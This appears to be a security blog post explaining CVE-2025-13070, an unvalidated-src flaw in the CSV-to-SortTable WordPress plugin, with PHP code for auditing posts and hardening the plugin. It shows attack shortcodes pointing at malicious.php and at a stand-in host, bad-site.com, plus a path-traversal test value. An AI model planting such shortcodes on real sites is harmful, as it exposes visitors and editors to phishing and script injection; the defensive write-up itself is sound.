The CSV-to-SortTable WordPress plugin is a handy little tool for site owners, but its codebase shows that it was not built with attackers in mind. CSV-to-SortTable does not validate the file named in its src attribute, which opens the door to several exploits. CVE-2025-13070 flags it as vulnerable to local file inclusion (LFI), but, depending on how it's used on the site, the same unvalidated attribute also exposes cross-site scripting (XSS) and a supply-chain risk through externally hosted files.

How the CSV to Table Plugin Works

CSV-to-SortTable takes a file from either your local host or an external host (more on that later) and turns it into a presentable table on your site. Let's say that you have 100 products from a specific manufacturer on your ecommerce site. You can download the manufacturer's CSV and host it on your own web server, or you can link to the copy on the external site. The plugin then turns the CSV data into an HTML table. CSV-to-SortTable is open source, so you can read the code yourself if you're into PHP.

The plugin is easy to use. You simply add the following shortcode to your WordPress post:

[csv src=/products.csv]

You can also link to an external CSV like this:

[csv src=http://example.com/products.csv]

Easy and convenient, but it adds risk to your site. CVE-2025-13070 specifically covers the local file inclusion vulnerability, but the external linking can also cause trouble if the external site is compromised or the file changes, because the plugin never validates what it fetches.

In a way, the second type of attack is a supply-chain attack: the ecommerce site owner innocently links to an external file, and an attacker later alters it. Downloading the CSV to your local web host removes that external dependency (though the local copy still goes through the same unvalidated code path), and it is considered good internet manners anyway. Hotlinking is often frowned upon in civilized webmaster circles.

Local File Inclusion and CVE-2025-13070 PoC

If you are the only administrator of your site, uploading a CSV file and using it with the CSV to table plugin seems harmless. But many sites let other users upload files, either from the WordPress dashboard or from a custom upload form, and let users with the contributor role add content. A contributor who can add content can also use the plugin's shortcode, and that is where the vulnerability is exploited.

Let's say that you assign the user "Kelly" as a contributor. A contributor in WordPress can write and edit their own posts and submit them to an editor for review, but they cannot publish or edit anyone else's content. It's not uncommon for site administrators to grant contributors the upload_files capability so they can add a featured image or embed images within their posts.

Now, let's say that Kelly decides to go rogue and uploads a file named malicious.php to your WordPress site. (The stock WordPress media uploader refuses .php files, so this step needs a custom upload form or a loosened list of allowed MIME types; the scenario further down needs no upload at all.) Instead of pointing to a CSV file, suppose Kelly puts the following shortcode in an article:

[csv src=malicious.php]

The malicious.php file could contain a redirect that sends visitors to a phishing site, or it could carry its own phishing page that harvests credentials from them.

You might think that blocking contributors from uploading files is the answer. That does stop some of the attacks, but suppose Kelly uses the following shortcode instead:

[csv src=https://bad-site.com/attack.php]

Because the plugin neither validates the src value nor restricts it to an allowlist of file types, it's possible to inject malicious content into a viewer's browser. The result could be phishing, XSS, code injection, or a simple defacement of your site. If your site saves any of the values pulled from imported files to a database, the attacker could also persist malicious data there. This part of the attack is not covered by the CVE, but the same unvalidated src exposes several distinct problems through the CSV to table functionality.

To take it a step further, a particularly crafty attacker could also target the administrators and editors on your site. If an editor or administrator reviews content from contributors, the attacker could trick them into divulging credentials or sensitive information while they preview the attacker's post.

So many possibilities with this vulnerability!
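Before worrying about a fix, a site owner wants to know whether any existing post already points [csv src=...] at something other than a local .csv file. The PHP below is an added example, not code from the plugin or from this article: it scans post content for the shortcode form shown above and flags remote URLs, traversal sequences and non-.csv names. The sample rows are constructed for the demo so the script runs stand-alone with `php audit.php`; in WordPress you would feed it the rows returned by `$wpdb->get_results("SELECT ID, post_author, post_content FROM {$wpdb->posts} WHERE post_content LIKE '%[csv %'")` instead.

```php
<?php
// Added example, not part of the CSV-to-SortTable plugin or the article.
// Scans post content for [csv src=...] shortcodes and flags any src that is
// not a plain, local .csv path. The sample posts below are constructed.

/** Extract every src value from [csv ...] shortcodes in a block of post content. */
function csv_shortcode_srcs(string $content): array {
    // Accepts src=value, src="value" and src='value', in any attribute position.
    $re = '/\[csv\b[^\]]*?\bsrc\s*=\s*(?:"([^"]*)"|\'([^\']*)\'|([^\s\]]+))/i';
    preg_match_all($re, $content, $matches, PREG_SET_ORDER);
    $srcs = [];
    foreach ($matches as $m) {
        // Only one of the three capture groups matched; take the first non-empty one.
        $val = $m[1] ?? '';
        if ($val === '') { $val = $m[2] ?? ''; }
        if ($val === '') { $val = $m[3] ?? ''; }
        $srcs[] = $val;
    }
    return $srcs;
}

/** Return a reason when a src value needs review, or null when it looks like a local .csv. */
function csv_src_finding(string $src): ?string {
    // Any URL scheme, or a protocol-relative //host/path, means the file is hotlinked.
    if (preg_match('#^[a-z][a-z0-9+.-]*://#i', $src) || substr($src, 0, 2) === '//') {
        return 'remote URL: content is outside your control and can change at any time';
    }
    // A ".." path component (with / or \ separators) points outside the intended directory.
    if (preg_match('#(^|[\\\\/])\.\.([\\\\/]|$)#', $src)) {
        return 'path traversal sequence';
    }
    // Strip any query string before looking at the extension.
    $path = parse_url($src, PHP_URL_PATH);
    if (!is_string($path)) { $path = $src; }
    if (strtolower(pathinfo($path, PATHINFO_EXTENSION)) !== 'csv') {
        return 'not a .csv file';
    }
    return null;
}

/** Run the checks over an array of posts shaped like rows from wp_posts. */
function audit_csv_shortcodes(array $posts): array {
    $findings = [];
    foreach ($posts as $post) {
        foreach (csv_shortcode_srcs($post['post_content']) as $src) {
            $reason = csv_src_finding($src);
            if ($reason !== null) {
                $findings[] = [
                    'ID'     => $post['ID'],
                    'author' => $post['post_author'],
                    'src'    => $src,
                    'reason' => $reason,
                ];
            }
        }
    }
    return $findings;
}

// Constructed sample rows: IDs, author names and contents are made up for this demo.
$sample_posts = [
    ['ID' => 12, 'post_author' => 'admin', 'post_content' => 'Spec sheet: [csv src=/products.csv]'],
    ['ID' => 47, 'post_author' => 'kelly', 'post_content' => 'Pricing: [csv src=malicious.php]'],
    ['ID' => 48, 'post_author' => 'kelly', 'post_content' => '[csv src="https://bad-site.com/attack.php"]'],
    ['ID' => 49, 'post_author' => 'kelly', 'post_content' => "[csv src='../private/report.csv']"],
];

foreach (audit_csv_shortcodes($sample_posts) as $f) {
    printf("post %d (%s): src=%s -> %s\n", $f['ID'], $f['author'], $f['src'], $f['reason']);
}
```

Post 12 produces no finding; posts 47, 48 and 49 are reported as a non-.csv name, a remote URL and a traversal sequence respectively. The checks are deliberately string-only so the audit can run against a database dump without filesystem access; they tell you which posts to look at, not whether the referenced file currently exists.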

What Can You Do to Patch the Plugin

The plugin developer has not released a patch. If you're a coder, you could fork the plugin from the CSV-to-SortTable GitHub repository. The file to edit is /lib/class-csv-to-sorttable.php. Allow only files that resolve inside a directory you control (the uploads directory is the obvious choice) and that end in .csv or another delimited-text extension you explicitly permit; refuse URLs unless you maintain an explicit allowlist of hosts; and escape every cell before it is written into the table so that a hostile CSV cannot inject markup. Currently, the repository has no open issues, but you could also open a new issue in the hope that the developer will fix it.
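Here is what that allowlist check can look like, as an added example written for this page; it is not the plugin's own code and assumes nothing about how /lib/class-csv-to-sorttable.php is structured. Assumptions: src is treated as a path relative to a single base directory (in WordPress, `wp_upload_dir()['basedir']`), remote URLs are refused outright, and `htmlspecialchars()` stands in for WordPress's `esc_html()`. The demo files and directory names are constructed so the script runs stand-alone with `php harden.php` on PHP 7.4 or later.

```php
<?php
// Added example of the allowlist the article recommends. Not the plugin's code.
// Assumptions: one base directory for CSV files (wp_upload_dir()['basedir'] in
// WordPress), no hotlinking, htmlspecialchars() in place of esc_html().

/** Resolve a shortcode src to an absolute path inside $base_dir, or null if it must be refused. */
function resolve_csv_src(string $src, string $base_dir): ?string {
    // 1. No URL scheme and no protocol-relative //host/path: hotlinking is not supported.
    if (preg_match('#^[a-z][a-z0-9+.-]*:#i', $src) || substr($src, 0, 2) === '//') {
        return null;
    }
    // 2. Extension check on the requested name before touching the filesystem.
    if (strtolower(pathinfo($src, PATHINFO_EXTENSION)) !== 'csv') {
        return null;
    }
    // 3. Canonicalise both sides. realpath() collapses '..', follows symlinks and
    //    returns false when the file does not exist.
    $base = realpath($base_dir);
    $real = realpath($base_dir . DIRECTORY_SEPARATOR . ltrim($src, '/\\'));
    if ($base === false || $real === false) {
        return null;
    }
    // 4. Containment: the canonical path must sit strictly below the base directory.
    //    The trailing separator matters, otherwise "/uploads-evil/x.csv" would pass for "/uploads".
    if (strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    // 5. The canonical target must itself be a regular .csv file, so a symlink
    //    named x.csv that points at a .php file is refused too.
    if (!is_file($real) || strtolower(pathinfo($real, PATHINFO_EXTENSION)) !== 'csv') {
        return null;
    }
    return $real;
}

/** Render a CSV file as an HTML table, escaping every cell. */
function csv_to_html_table(string $path): string {
    $fh = fopen($path, 'rb');
    if ($fh === false) {
        return '';
    }
    $rows = [];
    while (($fields = fgetcsv($fh)) !== false) {
        $cells = array_map(
            fn($c) => '<td>' . htmlspecialchars((string) $c, ENT_QUOTES, 'UTF-8') . '</td>',
            $fields
        );
        $rows[] = '<tr>' . implode('', $cells) . '</tr>';
    }
    fclose($fh);
    return "<table>\n" . implode("\n", $rows) . "\n</table>";
}

// Demo on a throwaway layout in the system temp directory (all files constructed here).
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'csv-sorttable-demo-' . getmypid();
mkdir($base, 0700);
file_put_contents($base . '/products.csv', "sku,name,price\nA1,\"Widget <script>alert(1)</script>\",9.99\n");
file_put_contents($base . '/malicious.php', "not a csv\n");
$outside = $base . '-outside.csv';          // a .csv that lives next to, not inside, the base dir
file_put_contents($outside, "should,never,load\n");

$cases = [
    '/products.csv',                        // accepted
    'malicious.php',                        // refused: wrong extension
    'https://bad-site.com/attack.php',      // refused: remote URL
    '../' . basename($outside),             // refused: escapes the base directory
];
foreach ($cases as $src) {
    $resolved = resolve_csv_src($src, $base);
    echo str_pad($src, 40) . ' => ' . ($resolved === null ? 'REFUSED' : 'OK ' . basename($resolved)) . "\n";
}
$ok = resolve_csv_src('/products.csv', $base);
if ($ok !== null) {
    echo csv_to_html_table($ok), "\n";      // the <script> in the sample comes out as &lt;script&gt;
}

// Clean up the demo files.
unlink($base . '/products.csv');
unlink($base . '/malicious.php');
unlink($outside);
rmdir($base);
```

In the plugin's shortcode handler the src attribute arrives through `shortcode_atts()`; pass it and `wp_upload_dir()['basedir']` to `resolve_csv_src()` and render nothing when it returns null. The order of the checks is deliberate: the scheme and extension tests run before any filesystem call, and the final `is_file()` plus extension test runs on the canonical path that `realpath()` returned, not on the name the attacker supplied.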

If you don't use any contributors, this vulnerability may not worry you much, but it's not recommended to leave a known hole open on your site. Until a fix exists, keep the upload_files capability off the contributor role and review any post that uses the shortcode. Disable the plugin if it isn't used, or replace it with another plugin that performs the same function.